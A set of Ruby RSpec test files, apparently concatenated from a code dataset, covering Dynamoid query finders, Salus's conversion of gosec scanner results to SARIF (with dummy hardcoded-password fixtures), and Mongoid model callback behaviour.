user1 = User.create(name: 'Josh', email: '[email protected]')
user2 = User.create(name: 'Justin', email: '[email protected]')
array = User.find_all_by_name('Gaga').to_a
expect(array).to be_empty
end
it 'should find on a query that is not indexed' do
user = User.create(password: 'Test')
array = User.find_all_by_password('Test').to_a
expect(array).to eq [user]
end
it 'should find on a query on multiple attributes that are not indexed' do
user = User.create(password: 'Test', name: 'Josh')
array = User.find_all_by_password_and_name('Test', 'Josh').to_a
expect(array).to eq [user]
end
it 'should return an empty array when fields exist but nothing is found' do
User.create_table
array = User.find_all_by_password('Test').to_a
expect(array).to be_empty
end
end
context 'find_all' do
it 'passes options to the adapter' do
pending 'This test is broken as we are overriding the consistent_read option to true inside the adapter'
user_ids = [%w[1 red], %w[1 green]]
Dynamoid.adapter.expects(:read).with(anything, user_ids, consistent_read: true)
User.find_all(user_ids, consistent_read: true)
end
end
describe '.find_all_by_secondary_index' do
def time_to_decimal(time)
BigDecimal(format('%d.%09d', time.to_i, time.nsec))
end
it 'returns exception if index could not be found' do
Post.create(post_id: 1, posted_at: Time.now)
expect do
Post.find_all_by_secondary_index(posted_at: Time.now.to_i)
end.to raise_exception(Dynamoid::Errors::MissingIndex)
end
context 'local secondary index' do
it 'queries the local secondary index' do
time = DateTime.now
p1 = Post.create(name: 'p1', post_id: 1, posted_at: time)
p2 = Post.create(name: 'p2', post_id: 1, posted_at: time + 1.day)
p3 = Post.create(name: 'p3', post_id: 2, posted_at: time)
posts = Post.find_all_by_secondary_index(
{ post_id: p1.post_id },
range: { name: 'p1' }
)
post = posts.first
expect(posts.count).to eql 1
expect(post.name).to eql 'p1'
expect(post.post_id).to eql '1'
end
end
context 'global secondary index' do
it 'can sort' do
time = DateTime.now
first_visit = Bar.create(name: 'Drank', visited_at: (time - 1.day).to_i)
Bar.create(name: 'Drank', visited_at: time.to_i)
last_visit = Bar.create(name: 'Drank', visited_at: (time + 1.day).to_i)
bars = Bar.find_all_by_secondary_index(
{ name: 'Drank' }, range: { 'visited_at.lte': (time + 10.days).to_i }
)
first_bar = bars.first
last_bar = bars.last
expect(bars.count).to eql 3
expect(first_bar.name).to eql first_visit.name
expect(first_bar.bar_id).to eql first_visit.bar_id
expect(last_bar.name).to eql last_visit.name
expect(last_bar.bar_id).to eql last_visit.bar_id
end
it 'honors :scan_index_forward => false' do
time = DateTime.now
first_visit = Bar.create(name: 'Drank', visited_at: time - 1.day)
Bar.create(name: 'Drank', visited_at: time)
last_visit = Bar.create(name: 'Drank', visited_at: time + 1.day)
different_bar = Bar.create(name: 'Junk', visited_at: time + 7.days)
bars = Bar.find_all_by_secondary_index(
{ name: 'Drank' }, range: { 'visited_at.lte': (time + 10.days).to_i },
scan_index_forward: false
)
first_bar = bars.first
last_bar = bars.last
expect(bars.count).to eql 3
expect(first_bar.name).to eql last_visit.name
expect(first_bar.bar_id).to eql last_visit.bar_id
expect(last_bar.name).to eql first_visit.name
expect(last_bar.bar_id).to eql first_visit.bar_id
end
it 'queries gsi with hash key' do
time = DateTime.now
p1 = Post.create(post_id: 1, posted_at: time, length: '10')
p2 = Post.create(post_id: 2, posted_at: time, length: '30')
p3 = Post.create(post_id: 3, posted_at: time, length: '10')
posts = Post.find_all_by_secondary_index(length: '10')
expect(posts.map(&:post_id).sort).to eql %w[1 3]
end
it 'queries gsi with hash and range key' do
time = Time.now
p1 = Post.create(post_id: 1, posted_at: time, name: 'post1')
p2 = Post.create(post_id: 2, posted_at: time + 1.day, name: 'post1')
p3 = Post.create(post_id: 3, posted_at: time, name: 'post3')
posts = Post.find_all_by_secondary_index(
{ name: 'post1' },
range: { posted_at: time_to_decimal(time) }
)
expect(posts.map(&:post_id).sort).to eql ['1']
end
end
describe 'custom range queries' do
describe 'string comparisons' do
it 'filters based on begins_with operator' do
time = DateTime.now
Post.create(post_id: 1, posted_at: time, name: 'fb_post')
Post.create(post_id: 1, posted_at: time + 1.day, name: 'blog_post')
posts = Post.find_all_by_secondary_index(
{ post_id: '1' }, range: { 'name.begins_with': 'blog_' }
)
expect(posts.map(&:name)).to eql ['blog_post']
end
end
describe 'numeric comparisons' do
before(:each) do
@time = DateTime.now
p1 = Post.create(post_id: 1, posted_at: @time, name: 'post')
p2 = Post.create(post_id: 2, posted_at: @time + 1.day, name: 'post')
p3 = Post.create(post_id: 3, posted_at: @time + 2.days, name: 'post')
end
it 'filters based on gt (greater than)' do
posts = Post.find_all_by_secondary_index(
{ name: 'post' },
range: { 'posted_at.gt': time_to_decimal(@time + 1.day) }
)
expect(posts.map(&:post_id).sort).to eql ['3']
end
it 'filters based on lt (less than)' do
posts = Post.find_all_by_secondary_index(
{ name: 'post' },
range: { 'posted_at.lt': time_to_decimal(@time + 1.day) }
)
expect(posts.map(&:post_id).sort).to eql ['1']
end
it 'filters based on gte (greater than or equal to)' do
posts = Post.find_all_by_secondary_index(
{ name: 'post' },
range: { 'posted_at.gte': time_to_decimal(@time + 1.day) }
)
expect(posts.map(&:post_id).sort).to eql %w[2 3]
end
it 'filters based on lte (less than or equal to)' do
posts = Post.find_all_by_secondary_index(
{ name: 'post' },
range: { 'posted_at.lte': time_to_decimal(@time + 1.day) }
)
expect(posts.map(&:post_id).sort).to eql %w[1 2]
end
it 'filters based on between operator' do
between = [time_to_decimal(@time - 1.day), time_to_decimal(@time + 1.5.day)]
posts = Post.find_all_by_secondary_index(
{ name: 'post' },
range: { 'posted_at.between': between }
)
expect(posts.map(&:post_id).sort).to eql %w[1 2]
end
end
end
end
end
| 34.944853 | 131 | 0.60484 |
ed692c39d8966fe17fae6e304001b25ca0f64f36 | 10,113 | require_relative '../../spec_helper'
require 'json'
require 'json-schema'
describe Sarif::GosecSarif do
describe '#parse_issue' do
let(:scanner) { Salus::Scanners::Gosec.new(repository: repo, config: {}) }
let(:path) { 'spec/fixtures/gosec/safe_goapp' }
before { scanner.run }
context 'scan report with duplicate vulnerabilities' do
let(:repo) { Salus::Repo.new(path) }
let(:path) { 'spec/fixtures/gosec/duplicate_entries' }
it 'should not include duplicate result entries' do
scan_report = Salus::ScanReport.new(scanner_name: "Gosec")
f = File.read("#{path}/report.json")
scan_report.log(f.to_s)
adapter = Sarif::GosecSarif.new(scan_report, path)
results = adapter.build_runs_object(true)["results"]
expect(results.size).to eq(3)
unique_results = Set.new
results.each do |result|
expect(unique_results.include?(result)).to eq(false)
unique_results.add(result)
end
end
it 'should not include duplicate rules' do
scan_report = Salus::ScanReport.new(scanner_name: "Gosec")
f = File.read('spec/fixtures/gosec/duplicate_entries/report.json')
scan_report.log(f.to_s)
adapter = Sarif::GosecSarif.new(scan_report, 'spec/fixtures/gosec/duplicate_entries')
rules = adapter.build_runs_object(true)["tool"][:driver]["rules"]
expect(rules.size).to eq(2)
unique_rules = Set.new
rules.each do |rule|
expect(unique_rules.include?(rule)).to eq(false)
unique_rules.add(rule)
end
end
end
describe '#sarif_level' do
context 'gosec severities' do
let(:path) { 'spec/fixtures/gosec/safe_goapp' }
let(:repo) { Salus::Repo.new(path) }
it 'are mapped to sarif levels' do
scan_report = Salus::ScanReport.new(scanner_name: "Gosec")
adapter = Sarif::GosecSarif.new(scan_report, path)
expect(adapter.sarif_level("MEDIUM")).to eq("error")
expect(adapter.sarif_level("HIGH")).to eq("error")
expect(adapter.sarif_level("LOW")).to eq("warning")
end
end
end
context 'scan report with logged vulnerabilites' do
let(:path) { 'spec/fixtures/gosec/vulnerable_goapp' }
let(:repo) { Salus::Repo.new(path) }
it 'parses information correctly' do
gosec_sarif = Sarif::GosecSarif.new(scanner.report, path)
issue = JSON.parse(scanner.log(''))['Issues'][0]
# should Parse and fill out hash
expected = "7: func test2() {\n8: \tpassword := \"hhend77dyyydbh&^psNSSZ)JSM--_%\"\n9: "\
"\tfmt.Println(\"hello, from the vulnerable app\" + password)\n"
expect(gosec_sarif.parse_issue(issue)).to include(
id: "G101",
name: "CWE-798",
level: "HIGH",
details: "Potential hardcoded credentials \nSeverity: HIGH\nConfidence: LOW\nCWE: "\
"https://cwe.mitre.org/data/definitions/798.html",
messageStrings: { "severity": { "text": "HIGH" },
"confidence": { "text": "LOW" },
"cwe": { "text": "https://cwe.mitre.org/data/definitions/798.html" } },
start_line: 8,
start_column: 2,
help_url: "https://cwe.mitre.org/data/definitions/798.html",
uri: "hello.go",
properties: { severity: "HIGH" },
code: expected
)
end
end
end
describe '#sarif_report' do
let(:scanner) { Salus::Scanners::Gosec.new(repository: repo, config: {}) }
before { scanner.run }
context 'non go project' do
let(:repo) { Salus::Repo.new('spec/fixtures/blank_repository') }
it 'should handle generated error' do
report = Salus::Report.new(project_name: "Neon Genesis")
report.add_scan_report(scanner.report, required: false)
report_object = JSON.parse(report.to_sarif)['runs'][0]
expect(report_object['invocations'][0]['executionSuccessful']).to eq(false)
message = report_object['invocations'][0]['toolExecutionNotifications'][0]['message']
expect(message['text']).to include('0 lines of code were scanned')
end
end
context 'go project with no vulnerabilities' do
let(:repo) { Salus::Repo.new('spec/fixtures/gosec/safe_goapp') }
it 'should generate an empty sarif report' do
report = Salus::Report.new(project_name: "Neon Genesis")
report.add_scan_report(scanner.report, required: false)
report_object = JSON.parse(report.to_sarif)['runs'][0]
expect(report_object['invocations'][0]['executionSuccessful']).to eq(true)
end
end
context 'go project with empty report containing whitespace' do
let(:repo) { Salus::Repo.new('spec/fixtures/gosec/safe_goapp') }
it 'should handle empty reports with whitespace' do
report = Salus::Report.new(project_name: "Neon Genesis")
# Override the report.log() to return "\n"
report.class.send(:define_method, :log, -> { "\n" })
expect_any_instance_of(Sarif::GosecSarif).not_to receive(:bugsnag_notify)
report.add_scan_report(scanner.report, required: false)
report_object = JSON.parse(report.to_sarif)['runs'][0]
expect(report_object['invocations'][0]['executionSuccessful']).to eq(true)
end
end
context 'go project with errors' do
let(:repo) { Salus::Repo.new('spec/fixtures/gosec/malformed_goapp') }
it 'should parse golang errors' do
report = Salus::Report.new(project_name: "Neon Genesis")
report.add_scan_report(scanner.report, required: false)
sarif = JSON.parse(report.to_sarif({ 'include_non_enforced' => true }))
result = sarif["runs"][0]["results"][0]
rules = sarif["runs"][0]["tool"]["driver"]["rules"]
expect(rules[0]['id']).to eq('SAL002')
expect(rules[0]['name']).to eq('Golang Error')
expect(rules[0]['fullDescription']['text']).to eq("errors reported by scanner")
expect(rules[0]['helpUri']).to eq('https://github.com/coinbase/salus/blob/master/docs/salus_reports.md')
expect(result['ruleId']).to eq('SAL002')
expect(result['ruleIndex']).to eq(0)
expect(result['message']['text']).to eq('Pintl not declared by package fmt')
expect(result['level']).to eq('note')
expect(result['locations'][0]['physicalLocation']['region']['startLine']).to eq(8)
end
end
context 'go project with vulnerabilities' do
let(:path) { 'spec/fixtures/gosec/recursive_vulnerable_goapp' }
let(:repo) { Salus::Repo.new(path) }
it 'should generate the right results and rules' do
report = Salus::Report.new(project_name: "Neon Genesis", repo_path: path)
report.add_scan_report(scanner.report, required: false)
sarif = JSON.parse(report.to_sarif({ 'include_non_enforced' => true }))
result = sarif["runs"][0]["results"][0]
rules = sarif["runs"][0]["tool"]["driver"]["rules"]
# Check rule info
expect(rules[0]['id']).to eq('G101')
expect(rules[0]['name']).to eq('CWE-798')
expect(rules[0]['fullDescription']['text']).to eq("Potential hardcoded credentials "\
"\nSeverity: HIGH\nConfidence: LOW\nCWE: https://cwe.mitre.org/data/definitions/798.html")
expect(rules[0]['helpUri']).to eq('https://cwe.mitre.org/data/definitions/798.html')
# Check result info
expect(result['ruleId']).to eq('G101')
expect(result['ruleIndex']).to eq(0)
expect(result['level']).to eq('error')
expect(result['locations'][0]['physicalLocation']['region']['startLine']).to eq(8)
expect(result['locations'][0]['physicalLocation']['region']['startColumn']).to eq(2)
expected = "7: func main() {\n8: \tpassword := \"hhend77dyyydbh&^psNSSZ)JSM--_%\"\n9: "\
"\tfmt.Println(\"hello, from the vulnerable app\" + password)\n"
snippet = result['locations'][0]['physicalLocation']['region']['snippet']['text'].to_s
expect(snippet).to eq(expected)
end
end
end
describe 'sarif diff' do
context 'git diff support' do
it 'should find code in git diff' do
git_diff_file = 'spec/fixtures/sarifs/diff/git_diff_1.txt'
snippet = "6: username := \"admin\"\n7: var password = " \
"\"f62e5bcda4fae4f82370da0c6f20697b8f8447ef\"\n8: \n"
git_diff = File.read(git_diff_file)
new_lines_in_git_diff = Sarif::BaseSarif.new_lines_in_git_diff(git_diff)
r = Sarif::GosecSarif.snippet_possibly_in_git_diff?(snippet, new_lines_in_git_diff)
expect(r).to be true
git_diff_file = 'spec/fixtures/sarifs/diff/git_diff_2.txt'
snippet = "6: username := \"admin\"\n7: var password = " \
"\"f62e5bcda4fae4f82370da0c6f20697b8f8447ef\"\n8: \n"
git_diff = File.read(git_diff_file)
new_lines_in_git_diff = Sarif::BaseSarif.new_lines_in_git_diff(git_diff)
r = Sarif::GosecSarif.snippet_possibly_in_git_diff?(snippet, new_lines_in_git_diff)
expect(r).to be true
git_diff_file = 'spec/fixtures/sarifs/diff/git_diff_2.txt'
snippet = "6: username := \"admin123\"\n7: var password = " \
"\"f62e5bcda4fae4f82370da0c6f20697b8f8447ef\""
git_diff = File.read(git_diff_file)
new_lines_in_git_diff = Sarif::BaseSarif.new_lines_in_git_diff(git_diff)
r = Sarif::GosecSarif.snippet_possibly_in_git_diff?(snippet, new_lines_in_git_diff)
expect(r).to be false
git_diff_file = 'spec/fixtures/sarifs/diff/git_diff_2.txt'
snippet = "6: username := \"admin123\"\n7: var password = " \
"\"f62e5bcda4fae4f82370da0c6f20697b8f8447ef\"\n8: \n"
git_diff = File.read(git_diff_file)
new_lines_in_git_diff = Sarif::BaseSarif.new_lines_in_git_diff(git_diff)
r = Sarif::GosecSarif.snippet_possibly_in_git_diff?(snippet, new_lines_in_git_diff)
expect(r).to be false
end
end
end
end
| 45.968182 | 112 | 0.632849 |
f838ec18911f83f70882becd6bd79e97bf7d53c8 | 47 | module PhgSudokuSolver
VERSION = "0.0.2"
end
| 11.75 | 22 | 0.723404 |
267c386a7a85403ae5edd5d53c58bfe1cfc976be | 54,111 | # frozen_string_literal: true
require "spec_helper"
require_relative './interceptable_spec_models'
describe Mongoid::Interceptable do
class TestClass
include Mongoid::Interceptable
attr_reader :before_save_called, :after_save_called
before_save do |object|
@before_save_called = true
end
after_save do |object|
@after_save_called = true
end
end
describe ".included" do
let(:klass) do
TestClass
end
it "includes the before_create callback" do
expect(klass).to respond_to(:before_create)
end
it "includes the after_create callback" do
expect(klass).to respond_to(:after_create)
end
it "includes the before_destroy callback" do
expect(klass).to respond_to(:before_destroy)
end
it "includes the after_destroy callback" do
expect(klass).to respond_to(:after_destroy)
end
it "includes the before_save callback" do
expect(klass).to respond_to(:before_save)
end
it "includes the after_save callback" do
expect(klass).to respond_to(:after_save)
end
it "includes the before_update callback" do
expect(klass).to respond_to(:before_update)
end
it "includes the after_update callback" do
expect(klass).to respond_to(:after_update)
end
it "includes the before_validation callback" do
expect(klass).to respond_to(:before_validation)
end
it "includes the after_validation callback" do
expect(klass).to respond_to(:after_validation)
end
it "includes the after_initialize callback" do
expect(klass).to respond_to(:after_initialize)
end
it "includes the after_build callback" do
expect(klass).to respond_to(:after_build)
end
end
describe ".after_find" do
let!(:player) do
Player.create!
end
context "when the callback is on a root document" do
context "when when the document is instantiated" do
it "does not execute the callback" do
expect(player.impressions).to eq(0)
end
end
context "when the document is found via #find" do
let(:from_db) do
Player.find(player.id)
end
it "executes the callback" do
expect(from_db.impressions).to eq(1)
end
end
context "when the document is found in a criteria" do
let(:from_db) do
Player.where(id: player.id).first
end
it "executes the callback" do
expect(from_db.impressions).to eq(1)
end
end
context "when the document is reloaded" do
let(:from_db) do
Player.find(player.id)
end
before do
from_db.reload
end
it "executes the callback" do
expect(from_db.impressions).to eq(1)
end
end
end
context "when the callback is on an embedded document" do
let!(:implant) do
player.implants.create!
end
context "when when the document is instantiated" do
it "does not execute the callback" do
expect(implant.impressions).to eq(0)
end
end
context "when the document is found via #find" do
let(:from_db) do
Player.find(player.id).implants.first
end
it "executes the callback" do
expect(from_db.impressions).to eq(1)
end
end
context "when the document is found in a criteria" do
let(:from_db) do
Player.find(player.id).implants.find(implant.id)
end
it "executes the callback" do
expect(from_db.impressions).to eq(1)
end
end
end
end
describe ".after_initialize" do
let(:game) do
Game.new
end
it "runs after document instantiation" do
expect(game.name).to eq("Testing")
end
context 'when the document is embedded' do
after do
Book.destroy_all
end
let(:book) do
book = Book.new({
:pages => [
{
content: "Page 1",
notes: [
{ message: "Page 1 / Note A" },
{ message: "Page 1 / Note B" }
]
},
{
content: "Page 2",
notes: [
{ message: "Page 2 / Note A" },
{ message: "Page 2 / Note B" }
]
}
]
})
book.id = '123'
book.save
book
end
let(:new_message) do
'Note C'
end
before do
book.pages.each do | page |
page.notes.destroy_all
page.notes.new(message: new_message)
page.save
end
end
let(:expected_messages) do
book.reload.pages.reduce([]) do |messages, p|
messages += p.notes.reduce([]) do |msgs, n|
msgs << n.message
end
end
end
it 'runs the callback on the embedded documents and saves the parent document' do
expect(expected_messages.all? { |m| m == new_message }).to be(true)
end
end
end
describe ".after_build" do
let(:weapon) do
Player.new(frags: 5).weapons.build
end
it "runs after document build (references_many)" do
expect(weapon.name).to eq("Holy Hand Grenade (5)")
end
let(:implant) do
Player.new(frags: 5).implants.build
end
it "runs after document build (embeds_many)" do
expect(implant.name).to eq('Cochlear Implant (5)')
end
let(:powerup) do
Player.new(frags: 5).build_powerup
end
it "runs after document build (references_one)" do
expect(powerup.name).to eq("Quad Damage (5)")
end
let(:augmentation) do
Player.new(frags: 5).build_augmentation
end
it "runs after document build (embeds_one)" do
expect(augmentation.name).to eq("Infolink (5)")
end
end
describe ".before_create" do
let(:artist) do
Artist.new(name: "Depeche Mode")
end
context "callback returns true" do
before do
expect(artist).to receive(:before_create_stub).once.and_return(true)
artist.save
end
it "gets saved" do
expect(artist.persisted?).to be true
end
end
context "callback aborts the callback chain" do
before do
Artist.before_create(:before_create_fail_stub)
expect(artist).to receive(:before_create_fail_stub).once.and_call_original
artist.save
end
after do
Artist.reset_callbacks(:create)
end
it "does not get saved" do
expect(artist.persisted?).to be false
end
end
end
describe ".before_save" do
context "when creating" do
let(:artist) do
Artist.new(name: "Depeche Mode")
end
after do
artist.delete
end
context "when the callback returns true" do
before do
expect(artist).to receive(:before_save_stub).once.and_return(true)
end
it "the save returns true" do
expect(artist.save).to be true
end
end
context "when callback halts the callback chain" do
before do
Artist.before_save(:before_save_fail_stub)
end
after do
Artist.reset_callbacks(:save)
end
it "the save returns false" do
expect(artist).to receive(:before_save_fail_stub).once.and_call_original
expect(artist.save).to be false
end
end
end
context "when updating" do
let(:artist) do
Artist.create!(name: "Depeche Mode").tap do |artist|
artist.name = "The Mountain Goats"
end
end
after do
artist.delete
end
context "when the callback returns true" do
before do
expect(artist).to receive(:before_update_stub).once.and_return(true)
end
it "the save returns true" do
expect(artist.save).to be true
end
end
context "when the callback halts the callback chain" do
before do
Artist.before_update(:before_update_fail_stub)
end
after do
Artist.reset_callbacks(:update)
end
it "the save returns false" do
expect(artist).to receive(:before_update_fail_stub).once.and_call_original
expect(artist.save).to be false
end
end
end
end
describe ".before_destroy" do
let(:artist) do
Artist.create!(name: "Depeche Mode")
end
before do
artist.name = "The Mountain Goats"
end
after do
artist.delete
end
context "when the callback returns true" do
before do
expect(artist).to receive(:before_destroy_stub).once.and_return(true)
end
it "the destroy returns true" do
expect(artist.destroy).to be true
end
end
context "when the callback halts the callback chain" do
before do
Artist.before_destroy(:before_destroy_fail_stub)
end
after do
Artist.reset_callbacks(:destroy)
end
it "the destroy returns false" do
expect(artist).to receive(:before_destroy_fail_stub).once.and_call_original
expect(artist.destroy).to be false
end
end
context "when cascading callbacks" do
let!(:moderat) do
Band.create!(name: "Moderat")
end
let!(:record) do
moderat.records.create(name: "Moderat")
end
before do
moderat.destroy
end
it "executes the child destroy callbacks" do
expect(record.before_destroy_called).to be true
end
end
end
describe "#run_after_callbacks" do
let(:object) do
TestClass.new
end
before do
object.run_after_callbacks(:save)
end
it "runs the after callbacks" do
expect(object.after_save_called).to be true
end
it "does not run the before callbacks" do
expect(object.before_save_called).to be nil
end
end
describe "#run_before_callbacks" do
let(:object) do
TestClass.new
end
before do
object.run_before_callbacks(:save)
end
it "runs the before callbacks" do
expect(object.before_save_called).to be true
end
it "does not run the after callbacks" do
expect(object.after_save_called).to be nil
end
end
context "when cascading callbacks" do
context "when the parent has a custom callback" do
context "when the child does not have the same callback defined" do
let(:exhibition) do
Exhibition.new
end
let!(:exhibitor) do
exhibition.exhibitors.build
end
context "when running the callbacks directly" do
before(:all) do
Exhibition.define_model_callbacks(:rearrange)
Exhibition.after_rearrange { }
end
after(:all) do
Exhibition.reset_callbacks(:rearrange)
end
it "does not cascade to the child" do
expect(exhibition.run_callbacks(:rearrange)).to be true
end
end
context "when the callbacks get triggered by a destroy" do
let(:band) do
Band.new
end
let!(:record) do
band.records.build
end
before(:all) do
Band.define_model_callbacks(:rearrange)
Band.set_callback(:validation, :before) do
run_callbacks(:rearrange)
end
end
after(:all) do
# ActiveSupport may raise an error when trying to reset callbacks on all of Band's
# descendants, regardless of whether they have a particular callback defined.
begin; Band.reset_callbacks(:rearrange); rescue; end
end
let(:attributes) do
{
records_attributes: {
"0" => { "_id" => record.id, "_destroy" => true }
}
}
end
it "does not cascade to the child" do
Band.accepts_nested_attributes_for :records, allow_destroy: true
expect(band.update_attributes(attributes)).to be true
end
end
end
end
context "when a document can exist in more than 1 level" do
let(:band) do
Band.new
end
let(:record) do
band.records.build
end
let(:note) do
Note.new
end
context "when adding the document at multiple levels" do
before do
band.notes.push(note)
record.notes.push(note)
end
context "when saving the root" do
it "only executes the callbacks once for each embed" do
expect(note).to receive(:update_saved).twice
band.save
end
end
end
end
context "when cascading after initialize" do
let!(:person) do
Person.create!
end
before do
person.services.create!(sid: 1)
end
it "doesn't cascade the initialize" do
expect_any_instance_of(Service).to receive(:after_initialize_called=).never
expect(Person.find(person.id)).to eq(person)
end
end
context "when attempting to cascade on a referenced relation" do
it "raises an error" do
expect {
Band.has_and_belongs_to_many :tags, cascade_callbacks: true
}.to raise_error(Mongoid::Errors::InvalidRelationOption)
end
end
context "when the documents are embedded one level" do
describe "#after_create" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_create_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_create_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.create_label(name: "Mute")
end
before do
label.after_create_called = false
band.save
end
it "does not execute the callback" do
expect(label.after_create_called).to be false
end
end
end
describe "#after_save" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_save_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_save_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.create_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_save_called).to be true
end
end
end
describe "#after_update" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "does not execute the callback" do
expect(label.after_update_called).to be false
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "does not execute the callback" do
expect(label.after_update_called).to be false
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
context "when the child is dirty" do
let!(:label) do
band.create_label(name: "Mute")
end
before do
label.name = "Nothing"
band.save
end
it "executes the callback" do
expect(label.after_update_called).to be true
end
end
context "when the child is not dirty" do
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "does not execute the callback" do
expect(label.after_update_called).to be false
end
end
end
end
describe "#after_validation" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_validation_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_validation_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.create_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_validation_called).to be true
end
end
end
describe "#before_create" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_create_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_create_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
before do
record.before_create_called = false
band.save
end
it "does not execute the callback" do
expect(record.before_create_called).to be false
end
end
end
describe "#before_save" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_save_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_save_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_save_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_save_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_save_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_save_called).to be true
end
end
context "when the child is created" do
let!(:band) do
Band.create
end
let!(:label) do
band.create_label(name: 'Label')
end
it "only executes callback once" do
expect(label.before_save_count).to be 1
end
end
end
describe "#before_update" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "does not execute the callback" do
expect(record.before_update_called).to be false
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "does not execute the callback" do
expect(record.before_update_called).to be false
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
context "when the child is dirty" do
before do
record.name = "Nothing"
band.save
end
it "executes the callback" do
expect(record.before_update_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_update_called).to be true
end
end
context "when the child is not dirty" do
before do
band.save
end
it "does not execute the callback" do
expect(record.before_update_called).to be false
end
end
end
end
describe "#before_validation" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_validation_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_validation_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_validation_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_validation_called).to be true
end
end
context 'when the parent is updated' do
let(:band) do
Band.create(name: "Moderat")
end
before do
band.update(records: [ { name: 'Black on Both Sides' }])
end
it 'executes the callback' do
expect(band.records.first.before_validation_called).to be true
end
it 'persists the change' do
expect(band.reload.records.first.before_validation_called).to be true
end
end
end
context 'when the parent is updated' do
let(:band) do
Band.create(name: "Moderat")
end
before do
band.update(records: [ { name: 'Black on Both Sides' }])
end
it 'executes the callback' do
expect(band.records.first.before_validation_called).to be true
end
it 'persists the change' do
expect(band.reload.records.first.before_validation_called).to be true
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_validation_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_validation_called).to be true
end
end
end
end
context "when the document is embedded multiple levels" do
describe "#before_create" do
context "when the child is new" do
context "when the root is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "executes the callback" do
expect(track.before_create_called).to be true
end
end
context "when the root is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
let!(:track) do
record.tracks.build(name: "Berlin")
end
before do
band.save
end
it "executes the callback" do
expect(track.before_create_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
let!(:track) do
record.tracks.create(name: "Berlin")
end
before do
track.before_create_called = false
band.save
end
it "does not execute the callback" do
expect(track.before_create_called).to be false
end
end
end
describe "#before_save" do
context "when the child is new" do
context "when the root is new" do
